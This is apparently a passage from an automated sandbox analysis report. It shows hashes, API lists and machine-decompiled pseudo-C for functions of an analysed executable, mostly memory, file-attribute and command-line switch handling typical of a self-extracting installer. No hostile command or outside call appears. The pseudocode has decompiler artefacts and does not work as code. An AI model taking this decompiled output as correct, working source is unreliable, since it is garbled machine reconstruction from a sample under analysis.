                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: CharPrev
                            • String ID:
                            • API String ID: 122130370-0
                            • Opcode ID: 1159c8ab11db305ce99dbb9ae4eb97d015ed76a5f1fe95c1a78d403be499cf29
                            • Instruction ID: bbfd6b28a6874737d7e803a2464d034e63a41458ffeb654f6696e461bda2d9c0
                            • Opcode Fuzzy Hash: 1159c8ab11db305ce99dbb9ae4eb97d015ed76a5f1fe95c1a78d403be499cf29
                            • Instruction Fuzzy Hash: 3CF04CB21082509BD331191D9884F67BFDE9BC7350F28056EF8DAC3205DA659C45C3A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E0094621E() {
                            				signed int _v8;
                            				char _v268;
                            				signed int _t5;
                            				void* _t9;
                            				void* _t13;
                            				void* _t19;
                            				void* _t20;
                            				signed int _t21;
                            
                            				_t5 =  *0x948004; // 0xec518a5e
                            				_v8 = _t5 ^ _t21;
                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                            					0x4f0 = 2;
                            					_t9 = E0094597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                            				} else {
                            					E009444B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                            					 *0x949124 = E00946285();
                            					_t9 = 0;
                            				}
                            				return E00946CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                            			}











                            0x00946229
                            0x00946230
                            0x00946247
                            0x0094626a
                            0x00946272
                            0x00946249
                            0x00946255
                            0x0094625f
                            0x00946264
                            0x00946264
                            0x00946284

                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0094623F
                              • Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                              • Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                              • Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                            • String ID:
                            • API String ID: 381621628-0
                            • Opcode ID: 2bcf65a63372ca3626d91b118b42345426b3dcf37fe29c1055fc628b033adb2f
                            • Instruction ID: f75e4572c4befcbb32aa324ee34eeeedfb2a8c203a15ee1111311df7d4ea0ae1
                            • Opcode Fuzzy Hash: 2bcf65a63372ca3626d91b118b42345426b3dcf37fe29c1055fc628b033adb2f
                            • Instruction Fuzzy Hash: EDF0E2B0718208BBE750EB749D02FBF37ACDB86300F40046AB986D6092EDB49D448651
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00944B60(signed int _a4) {
                            				signed int _t9;
                            				signed int _t15;
                            
                            				_t15 = _a4 * 0x18;
                            				if( *((intOrPtr*)(_t15 + 0x948d64)) != 1) {
                            					_t9 = FindCloseChangeNotification( *(_t15 + 0x948d74)); // executed
                            					if(_t9 == 0) {
                            						return _t9 | 0xffffffff;
                            					}
                            					 *((intOrPtr*)(_t15 + 0x948d60)) = 1;
                            					return 0;
                            				}
                            				 *((intOrPtr*)(_t15 + 0x948d60)) = 1;
                            				 *((intOrPtr*)(_t15 + 0x948d68)) = 0;
                            				 *((intOrPtr*)(_t15 + 0x948d70)) = 0;
                            				 *((intOrPtr*)(_t15 + 0x948d6c)) = 0;
                            				return 0;
                            			}





                            0x00944b66
                            0x00944b74
                            0x00944b98
                            0x00944ba0
                            0x00000000
                            0x00944bac
                            0x00944ba4
                            0x00000000
                            0x00944ba4
                            0x00944b78
                            0x00944b7e
                            0x00944b84
                            0x00944b8a
                            0x00000000

                            APIs
                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00944FA1,00000000), ref: 00944B98
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: ChangeCloseFindNotification
                            • String ID:
                            • API String ID: 2591292051-0
                            • Opcode ID: 5eb7007ddbb49fac873229c7e7e0cb9bc937aa3b7ff170d16668761c3d81cc6a
                            • Instruction ID: 48d66ddb010021b5d969c915578f870fb27324b565daee9946a333cfde0bfd36
                            • Opcode Fuzzy Hash: 5eb7007ddbb49fac873229c7e7e0cb9bc937aa3b7ff170d16668761c3d81cc6a
                            • Instruction Fuzzy Hash: F9F01271D45B089E87719F39CC00E5BBBECEAD53603100A2ED46EE21D0FB30A441DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E009466AE(CHAR* __ecx) {
                            				unsigned int _t1;
                            
                            				_t1 = GetFileAttributesA(__ecx); // executed
                            				if(_t1 != 0xffffffff) {
                            					return  !(_t1 >> 4) & 0x00000001;
                            				} else {
                            					return 0;
                            				}
                            			}




                            0x009466b1
                            0x009466ba
                            0x009466c7
                            0x009466bc
                            0x009466be
                            0x009466be

                            APIs
                            • GetFileAttributesA.KERNELBASE(?,00944777,?,00944E38,?), ref: 009466B1
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 4bd22df701c910d7fc000299fbe43cdf7747e473a1b9623b54b339a03941ce7b
                            • Instruction ID: b3b42f9d5855d5d17d42bf095c884195fdeb9705b125d891d453289fb5390de1
                            • Opcode Fuzzy Hash: 4bd22df701c910d7fc000299fbe43cdf7747e473a1b9623b54b339a03941ce7b
                            • Instruction Fuzzy Hash: 06B092BA276850426A2006716C299562945A6C363A7E51B94F032C01E0CA3EC846E005
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00944CA0(long _a4) {
                            				void* _t2;
                            
                            				_t2 = GlobalAlloc(0, _a4); // executed
                            				return _t2;
                            			}




                            0x00944caa
                            0x00944cb1

                            APIs
                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00944CAA
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: AllocGlobal
                            • String ID:
                            • API String ID: 3761449716-0
                            • Opcode ID: 57a2465b53085a08bb763e72ed16563d5629bb55b3c505bd2d116222fe28d70b
                            • Instruction ID: ab36d7f57989ce697852df03e7e491199f882d5aacfae2b889bd3e1ac3464d5d
                            • Opcode Fuzzy Hash: 57a2465b53085a08bb763e72ed16563d5629bb55b3c505bd2d116222fe28d70b
                            • Instruction Fuzzy Hash: 79B0123608820CB7DF001FC2EC09F853F1DE7C6771F140000F60C450508A72941096A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00944CC0(void* _a4) {
                            				void* _t2;
                            
                            				_t2 = GlobalFree(_a4); // executed
                            				return _t2;
                            			}




                            0x00944cc8
                            0x00944ccf

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: FreeGlobal
                            • String ID:
                            • API String ID: 2979337801-0
                            • Opcode ID: cdc2986b2fa4d1473fedbcbe994e38ec93723bf3ae67f85a6a2228b1d1deb482
                            • Instruction ID: 8bc44e673db254caec15e31b44fba7e19c90828084cd2ea665a55750931c5bb6
                            • Opcode Fuzzy Hash: cdc2986b2fa4d1473fedbcbe994e38ec93723bf3ae67f85a6a2228b1d1deb482
                            • Instruction Fuzzy Hash: 8DB0123104410CB78F001B42EC08C453F1DD6C22707000010F50C410218B3398119585
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E00945C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				signed int _v12;
                            				CHAR* _v265;
                            				char _v266;
                            				char _v267;
                            				char _v268;
                            				CHAR* _v272;
                            				char _v276;
                            				signed int _v296;
                            				char _v556;
                            				signed int _t61;
                            				int _t63;
                            				char _t67;
                            				CHAR* _t69;
                            				signed int _t71;
                            				void* _t75;
                            				char _t79;
                            				void* _t83;
                            				void* _t85;
                            				void* _t87;
                            				intOrPtr _t88;
                            				void* _t100;
                            				intOrPtr _t101;
                            				CHAR* _t104;
                            				intOrPtr _t105;
                            				void* _t111;
                            				void* _t115;
                            				CHAR* _t118;
                            				void* _t119;
                            				void* _t127;
                            				CHAR* _t129;
                            				void* _t132;
                            				void* _t142;
                            				signed int _t143;
                            				CHAR* _t144;
                            				void* _t145;
                            				void* _t146;
                            				void* _t147;
                            				void* _t149;
                            				char _t155;
                            				void* _t157;
                            				void* _t162;
                            				void* _t163;
                            				char _t167;
                            				char _t170;
                            				CHAR* _t173;
                            				void* _t177;
                            				intOrPtr* _t183;
                            				intOrPtr* _t192;
                            				CHAR* _t199;
                            				void* _t200;
                            				CHAR* _t201;
                            				void* _t205;
                            				void* _t206;
                            				int _t209;
                            				void* _t210;
                            				void* _t212;
                            				void* _t213;
                            				CHAR* _t218;
                            				intOrPtr* _t219;
                            				intOrPtr* _t220;
                            				signed int _t221;
                            				signed int _t223;
                            
                            				_t173 = __ecx;
                            				_t61 =  *0x948004; // 0xec518a5e
                            				_v8 = _t61 ^ _t221;
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_t209 = 1;
                            				if(__ecx == 0 ||  *__ecx == 0) {
                            					_t63 = 1;
                            				} else {
                            					L2:
                            					while(_t209 != 0) {
                            						_t67 =  *_t173;
                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                            							_t173 = CharNextA(_t173);
                            							continue;
                            						}
                            						_v272 = _t173;
                            						if(_t67 == 0) {
                            							break;
                            						} else {
                            							_t69 = _v272;
                            							_t177 = 0;
                            							_t213 = 0;
                            							_t163 = 0;
                            							_t202 = 1;
                            							do {
                            								if(_t213 != 0) {
                            									if(_t163 != 0) {
                            										break;
                            									} else {
                            										goto L21;
                            									}
                            								} else {
                            									_t69 =  *_t69;
                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                            										break;
                            									} else {
                            										_t69 = _v272;
                            										L21:
                            										_t155 =  *_t69;
                            										if(_t155 != 0x22) {
                            											if(_t202 >= 0x104) {
                            												goto L106;
                            											} else {
                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                            												_t177 = _t177 + 1;
                            												_t202 = _t202 + 1;
                            												_t157 = 1;
                            												goto L30;
                            											}
                            										} else {
                            											if(_v272[1] == 0x22) {
                            												if(_t202 >= 0x104) {
                            													L106:
                            													_t63 = 0;
                            													L125:
                            													_pop(_t210);
                            													_pop(_t212);
                            													_pop(_t162);
                            													return E00946CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                            												} else {
                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                            													_t177 = _t177 + 1;
                            													_t202 = _t202 + 1;
                            													_t157 = 2;
                            													goto L30;
                            												}
                            											} else {
                            												_t157 = 1;
                            												if(_t213 != 0) {
                            													_t163 = 1;
                            												} else {
                            													_t213 = 1;
                            												}
                            												goto L30;
                            											}
                            										}
                            									}
                            								}
                            								goto L131;
                            								L30:
                            								_v272 =  &(_v272[_t157]);
                            								_t69 = _v272;
                            							} while ( *_t69 != 0);
                            							if(_t177 >= 0x104) {
                            								E00946E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                            								asm("int3");
                            								_push(_t221);
                            								_t222 = _t223;
                            								_t71 =  *0x948004; // 0xec518a5e
                            								_v296 = _t71 ^ _t223;
                            								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                            									0x4f0 = 2;
                            									_t75 = E0094597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                            								} else {
                            									E009444B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                            									 *0x949124 = E00946285();
                            									_t75 = 0;
                            								}
                            								return E00946CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                            							} else {
                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                            								if(_t213 == 0) {
                            									if(_t163 != 0) {
                            										goto L34;
                            									} else {
                            										goto L40;
                            									}
                            								} else {
                            									if(_t163 != 0) {
                            										L40:
                            										_t79 = _v268;
                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                            											_t83 = CharUpperA(_v267) - 0x3f;
                            											if(_t83 == 0) {
                            												_t202 = 0x521;
                            												E009444B9(0, 0x521, 0x941140, 0, 0x40, 0);
                            												_t85 =  *0x948588; // 0x0
                            												if(_t85 != 0) {
                            													CloseHandle(_t85);
                            												}
                            												ExitProcess(0);
                            											}
                            											_t87 = _t83 - 4;
                            											if(_t87 == 0) {
                            												if(_v266 != 0) {
                            													if(_v266 != 0x3a) {
                            														goto L49;
                            													} else {
                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                            														_t215 =  &_v268 + _t167;
                            														_t183 =  &_v268 + _t167;
                            														_t50 = _t183 + 1; // 0x1
                            														_t202 = _t50;
                            														do {
                            															_t88 =  *_t183;
                            															_t183 = _t183 + 1;
                            														} while (_t88 != 0);
                            														if(_t183 == _t202) {
                            															goto L49;
                            														} else {
                            															_t205 = 0x5b;
                            															if(E0094667F(_t215, _t205) == 0) {
                            																L115:
                            																_t206 = 0x5d;
                            																if(E0094667F(_t215, _t206) == 0) {
                            																	L117:
                            																	_t202 =  &_v276;
                            																	_v276 = _t167;
                            																	if(E00945C17(_t215,  &_v276) == 0) {
                            																		goto L49;
                            																	} else {
                            																		_t202 = 0x104;
                            																		E00941680(0x948c42, 0x104, _v276 + _t167 +  &_v268);
                            																	}
                            																} else {
                            																	_t202 = 0x5b;
                            																	if(E0094667F(_t215, _t202) == 0) {
                            																		goto L49;
                            																	} else {
                            																		goto L117;
                            																	}
                            																}
                            															} else {
                            																_t202 = 0x5d;
                            																if(E0094667F(_t215, _t202) == 0) {
                            																	goto L49;
                            																} else {
                            																	goto L115;
                            																}
                            															}
                            														}
                            													}
                            												} else {
                            													 *0x948a24 = 1;
                            												}
                            												goto L50;
                            											} else {
                            												_t100 = _t87 - 1;
                            												if(_t100 == 0) {
                            													L98:
                            													if(_v266 != 0x3a) {
                            														goto L49;
                            													} else {
                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                            														_t217 =  &_v268 + _t170;
                            														_t192 =  &_v268 + _t170;
                            														_t38 = _t192 + 1; // 0x1
                            														_t202 = _t38;
                            														do {
                            															_t101 =  *_t192;
                            															_t192 = _t192 + 1;
                            														} while (_t101 != 0);
                            														if(_t192 == _t202) {
                            															goto L49;
                            														} else {
                            															_t202 =  &_v276;
                            															_v276 = _t170;
                            															if(E00945C17(_t217,  &_v276) == 0) {
                            																goto L49;
                            															} else {
                            																_t104 = CharUpperA(_v267);
                            																_t218 = 0x948b3e;
                            																_t105 = _v276;
                            																if(_t104 != 0x54) {
                            																	_t218 = 0x948a3a;
                            																}
                            																E00941680(_t218, 0x104, _t105 + _t170 +  &_v268);
                            																_t202 = 0x104;
                            																E0094658A(_t218, 0x104, 0x941140);
                            																if(E009431E0(_t218) != 0) {
                            																	goto L50;
                            																} else {
                            																	goto L106;
                            																}
                            															}
                            														}
                            													}
                            												} else {
                            													_t111 = _t100 - 0xa;
                            													if(_t111 == 0) {
                            														if(_v266 != 0) {
                            															if(_v266 != 0x3a) {
                            																goto L49;
                            															} else {
                            																_t199 = _v265;
                            																if(_t199 != 0) {
                            																	_t219 =  &_v265;
                            																	do {
                            																		_t219 = _t219 + 1;
                            																		_t115 = CharUpperA(_t199) - 0x45;
                            																		if(_t115 == 0) {
                            																			 *0x948a2c = 1;
                            																		} else {
                            																			_t200 = 2;
                            																			_t119 = _t115 - _t200;
                            																			if(_t119 == 0) {
                            																				 *0x948a30 = 1;
                            																			} else {
                            																				if(_t119 == 0xf) {
                            																					 *0x948a34 = 1;
                            																				} else {
                            																					_t209 = 0;
                            																				}
                            																			}
                            																		}
                            																		_t118 =  *_t219;
                            																		_t199 = _t118;
                            																	} while (_t118 != 0);
                            																}
                            															}
                            														} else {
                            															 *0x948a2c = 1;
                            														}
                            														goto L50;
                            													} else {
                            														_t127 = _t111 - 3;
                            														if(_t127 == 0) {
                            															if(_v266 != 0) {
                            																if(_v266 != 0x3a) {
                            																	goto L49;
                            																} else {
                            																	_t129 = CharUpperA(_v265);
                            																	if(_t129 == 0x31) {
                            																		goto L76;
                            																	} else {
                            																		if(_t129 == 0x41) {
                            																			goto L83;
                            																		} else {
                            																			if(_t129 == 0x55) {
                            																				goto L76;
                            																			} else {
                            																				goto L49;
                            																			}
                            																		}
                            																	}
                            																}
                            															} else {
                            																L76:
                            																_push(2);
                            																_pop(1);
                            																L83:
                            																 *0x948a38 = 1;
                            															}
                            															goto L50;
                            														} else {
                            															_t132 = _t127 - 1;
                            															if(_t132 == 0) {
                            																if(_v266 != 0) {
                            																	if(_v266 != 0x3a) {
                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                            																			goto L49;
                            																		}
                            																	} else {
                            																		_t201 = _v265;
                            																		 *0x949a2c = 1;
                            																		if(_t201 != 0) {
                            																			_t220 =  &_v265;
                            																			do {
                            																				_t220 = _t220 + 1;
                            																				_t142 = CharUpperA(_t201) - 0x41;
                            																				if(_t142 == 0) {
                            																					_t143 = 2;
                            																					 *0x949a2c =  *0x949a2c | _t143;
                            																					goto L70;
                            																				} else {
                            																					_t145 = _t142 - 3;
                            																					if(_t145 == 0) {
                            																						 *0x948d48 =  *0x948d48 | 0x00000040;
                            																					} else {
                            																						_t146 = _t145 - 5;
                            																						if(_t146 == 0) {
                            																							 *0x949a2c =  *0x949a2c & 0xfffffffd;
                            																							goto L70;
                            																						} else {
                            																							_t147 = _t146 - 5;
                            																							if(_t147 == 0) {
                            																								 *0x949a2c =  *0x949a2c & 0xfffffffe;
                            																								goto L70;
                            																							} else {
                            																								_t149 = _t147;
                            																								if(_t149 == 0) {
                            																									 *0x948d48 =  *0x948d48 | 0x00000080;
                            																								} else {
                            																									if(_t149 == 3) {
                            																										 *0x949a2c =  *0x949a2c | 0x00000004;
                            																										L70:
                            																										 *0x948a28 = 1;
                            																									} else {
                            																										_t209 = 0;
                            																									}
                            																								}
                            																							}
                            																						}
                            																					}
                            																				}
                            																				_t144 =  *_t220;
                            																				_t201 = _t144;
                            																			} while (_t144 != 0);
                            																		}
                            																	}
                            																} else {
                            																	 *0x949a2c = 3;
                            																	 *0x948a28 = 1;
                            																}
                            																goto L50;
                            															} else {
                            																if(_t132 == 0) {
                            																	goto L98;
                            																} else {
                            																	L49:
                            																	_t209 = 0;
                            																	L50:
                            																	_t173 = _v272;
                            																	if( *_t173 != 0) {
                            																		goto L2;
                            																	} else {
                            																		break;
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										} else {
                            											goto L106;
                            										}
                            									} else {
                            										L34:
                            										_t209 = 0;
                            										break;
                            									}
                            								}
                            							}
                            						}
                            						goto L131;
                            					}
                            					if( *0x948a2c != 0 &&  *0x948b3e == 0) {
                            						if(GetModuleFileNameA( *0x949a3c, 0x948b3e, 0x104) == 0) {
                            							_t209 = 0;
                            						} else {
                            							_t202 = 0x5c;
                            							 *((char*)(E009466C8(0x948b3e, _t202) + 1)) = 0;
                            						}
                            					}
                            					_t63 = _t209;
                            				}
                            				L131:
                            			}


































































                            0x00945c9e
                            0x00945ca9
                            0x00945cb0
                            0x00945cb3
                            0x00945cb6
                            0x00945cb7
                            0x00945cb8
                            0x00945cbd
                            0x00946204
                            0x00945ccb
                            0x00000000
                            0x00945ccb
                            0x00945cd3
                            0x00945cd7
                            0x00945cf4
                            0x00000000
                            0x00945cf4
                            0x00945cf8
                            0x00945d00
                            0x00000000
                            0x00945d06
                            0x00945d06
                            0x00945d0e
                            0x00945d10
                            0x00945d12
                            0x00945d14
                            0x00945d15
                            0x00945d17
                            0x00945d49
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00945d19
                            0x00945d19
                            0x00945d1d
                            0x00000000
                            0x00945d3f
                            0x00945d3f
                            0x00945d4b
                            0x00945d4b
                            0x00945d4f
                            0x00945d8d
                            0x00000000
                            0x00945d93
                            0x00945d93
                            0x00945d9a
                            0x00945d9d
                            0x00945d9e
                            0x00000000
                            0x00945d9e
                            0x00945d51
                            0x00945d5b
                            0x00945d72
                            0x009460fb
                            0x009460fb
                            0x00946207
                            0x0094620a
                            0x0094620b
                            0x0094620e
                            0x00946217
                            0x00945d78
                            0x00945d78
                            0x00945d80
                            0x00945d83
                            0x00945d84
                            0x00000000
                            0x00945d84
                            0x00945d5d
                            0x00945d5f
                            0x00945d62
                            0x00945d68
                            0x00945d64
                            0x00945d64
                            0x00945d64
                            0x00000000
                            0x00945d62
                            0x00945d5b
                            0x00945d4f
                            0x00945d1d
                            0x00000000
                            0x00945d9f
                            0x00945d9f
                            0x00945da5
                            0x00945dab
                            0x00945dba
                            0x00946218
                            0x0094621d
                            0x00946220
                            0x00946221
                            0x00946229
                            0x00946230
                            0x00946247
                            0x0094626a
                            0x00946272
                            0x00946249
                            0x00946255
                            0x0094625f
                            0x00946264
                            0x00946264
                            0x00946284
                            0x00945dc0
                            0x00945dc0
                            0x00945dca
                            0x00945e22
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00945dcc
                            0x00945dce
                            0x00945e24
                            0x00945e24
                            0x00945e2c
                            0x00945e47
                            0x00945e4a
                            0x009461d2
                            0x009461e2
                            0x009461e7
                            0x009461ee
                            0x009461f1
                            0x009461f1
                            0x009461f8
                            0x009461f8
                            0x00945e50
                            0x00945e53
                            0x00946109
                            0x0094611f
                            0x00000000
                            0x00946125
                            0x00946137
                            0x0094613a
                            0x0094613c
                            0x0094613e
                            0x0094613e
                            0x00946141
                            0x00946141
                            0x00946143
                            0x00946144
                            0x0094614a
                            0x00000000
                            0x00946150
                            0x00946152
                            0x0094615c
                            0x00946170
                            0x00946172
                            0x0094617c
                            0x00946190
                            0x00946190
                            0x00946196
                            0x009461a5
                            0x00000000
                            0x009461ab
                            0x009461b9
                            0x009461c6
                            0x009461c6
                            0x0094617e
                            0x00946180
                            0x0094618a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0094618a
                            0x0094615e
                            0x00946160
                            0x0094616a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0094616a
                            0x0094615c
                            0x0094614a
                            0x0094610b
                            0x0094610e
                            0x0094610e
                            0x00000000
                            0x00945e59
                            0x00945e59
                            0x00945e5c
                            0x0094604f
                            0x00946056
                            0x00000000
                            0x0094605c
                            0x0094606e
                            0x00946071
                            0x00946073
                            0x00946075
                            0x00946075
                            0x00946078
                            0x00946078
                            0x0094607a
                            0x0094607b
                            0x00946081
                            0x00000000
                            0x00946087
                            0x00946087
                            0x0094608d
                            0x0094609c
                            0x00000000
                            0x009460a2
                            0x009460aa
                            0x009460b2
                            0x009460b7
                            0x009460bd
                            0x009460bf
                            0x009460bf
                            0x009460d6
                            0x009460e0
                            0x009460e7
                            0x009460f5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009460f5
                            0x0094609c
                            0x00946081
                            0x00945e62
                            0x00945e62
                            0x00945e65
                            0x00945fd3
                            0x00945fe9
                            0x00000000
                            0x00945fef
                            0x00945fef
                            0x00945ff7
                            0x00945ffd
                            0x00946003
                            0x00946006
                            0x00946011
                            0x00946014
                            0x0094603d
                            0x00946016
                            0x00946018
                            0x00946019
                            0x0094601b
                            0x00946033
                            0x0094601d
                            0x00946020
                            0x00946029
                            0x00946022
                            0x00946022
                            0x00946022
                            0x00946020
                            0x0094601b
                            0x00946042
                            0x00946044
                            0x00946046
                            0x0094604a
                            0x00945ff7
                            0x00945fd5
                            0x00945fd8
                            0x00945fd8
                            0x00000000
                            0x00945e6b
                            0x00945e6b
                            0x00945e6e
                            0x00945f8b
                            0x00945f99
                            0x00000000
                            0x00945f9f
                            0x00945fa7
                            0x00945faf
                            0x00000000
                            0x00945fb1
                            0x00945fb3
                            0x00000000
                            0x00945fb5
                            0x00945fb7
                            0x00000000
                            0x00945fb9
                            0x00000000
                            0x00945fb9
                            0x00945fb7
                            0x00945fb3
                            0x00945faf
                            0x00945f8d
                            0x00945f8d
                            0x00945f8d
                            0x00945f8f
                            0x00945fc1
                            0x00945fc1
                            0x00945fc1
                            0x00000000
                            0x00945e74
                            0x00945e74
                            0x00945e77
                            0x00945ea0
                            0x00945ebd
                            0x00945f79
                            0x00000000
                            0x00945f7f
                            0x00945ec3
                            0x00945ec3
                            0x00945ecc
                            0x00945ed4
                            0x00945ed6
                            0x00945edc
                            0x00945edf
                            0x00945eea
                            0x00945eed
                            0x00945f3f
                            0x00945f40
                            0x00000000
                            0x00945eef
                            0x00945eef
                            0x00945ef2
                            0x00945f34
                            0x00945ef4
                            0x00945ef4
                            0x00945ef7
                            0x00945f2b
                            0x00000000
                            0x00945ef9
                            0x00945ef9
                            0x00945efc
                            0x00945f22
                            0x00000000
                            0x00945efe
                            0x00945eff
                            0x00945f02
                            0x00945f16
                            0x00945f04
                            0x00945f07
                            0x00945f0d
                            0x00945f46
                            0x00945f46
                            0x00945f09
                            0x00945f09
                            0x00945f09
                            0x00945f07
                            0x00945f02
                            0x00945efc
                            0x00945ef7
                            0x00945ef2
                            0x00945f4c
                            0x00945f4e
                            0x00945f50
                            0x00945f54
                            0x00945ed4
                            0x00945ea2
                            0x00945ea4
                            0x00945eaf
                            0x00945eaf
                            0x00000000
                            0x00945e79
                            0x00945e7d
                            0x00000000
                            0x00945e83
                            0x00945e83
                            0x00945e83
                            0x00945e85
                            0x00945e85
                            0x00945e8e
                            0x00000000
                            0x00945e94
                            0x00000000
                            0x00945e94
                            0x00945e8e
                            0x00945e7d
                            0x00945e77
                            0x00945e6e
                            0x00945e65
                            0x00945e5c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00945dd0
                            0x00945dd0
                            0x00945dd0
                            0x00000000
                            0x00945dd0
                            0x00945dce
                            0x00945dca
                            0x00945dba
                            0x00000000
                            0x00945d00
                            0x00945dd9
                            0x00945e04
                            0x009461fe
                            0x00945e0a
                            0x00945e0c
                            0x00945e17
                            0x00945e17
                            0x00945e04
                            0x00946200
                            0x00946200
                            0x00000000

                            APIs
                            • CharNextA.USER32(?,00000000,?,?), ref: 00945CEE
                            • GetModuleFileNameA.KERNEL32(00948B3E,00000104,00000000,?,?), ref: 00945DFC
                            • CharUpperA.USER32(?), ref: 00945E3E
